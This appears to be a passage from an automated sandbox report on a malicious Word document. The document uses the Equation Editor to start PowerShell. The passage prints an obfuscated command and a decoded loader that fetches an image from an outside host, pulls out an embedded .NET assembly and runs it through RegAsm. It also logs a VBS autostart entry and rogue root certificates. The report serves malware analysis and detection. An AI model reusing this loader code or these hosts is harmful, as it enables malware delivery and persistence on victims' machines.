$loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.MRHH/88082/6.13.271.701//:ptth' , '1' , 'C:\ProgramData\' , 'antre','RegAsm',''))} }"
                      Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMwDgTrevDgTreDcDgTreOQDgTre3DgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreODgTreDgTre4DgTreDIDgTreMDgTreDgTreyDgTreDkDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029', 'https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.MRHH/88082/6.13.271.701//:ptth' , '1' , 'C:\ProgramData\' , 'antre','RegAsm',''))} }"Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_0041CB50 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,15_2_0041CB50
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_00457106 push ecx; ret 15_2_00457119
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_0045B11A push esp; ret 15_2_0045B141
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_0045E54D push esi; ret 15_2_0045E556
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_00457A28 push eax; ret 15_2_00457A46
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_00434E56 push ecx; ret 15_2_00434E69

                      Persistence and Installation Behavior

                      barindex
                      Command shell drops VBS files
                      Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\ProgramData\antre.vbsJump to behavior
                      Installs new ROOT certificates
                      Source: C:\Windows\SysWOW64\wscript.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C BlobJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C BlobJump to behavior
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_035C054A URLDownloadToFileW,ShellExecuteW,ExitProcess,2_2_035C054A

                      Boot Survival

                      barindex
                      Creates autostart registry keys with suspicious values (likely registry only malware)
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Path C:\ProgramData\antre.vbsJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_0041AA4A OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,15_2_0041AA4A
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run PathJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run PathJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_0041CB50 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,15_2_0041CB50
                      Source: C:\Windows\SysWOW64\wscript.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
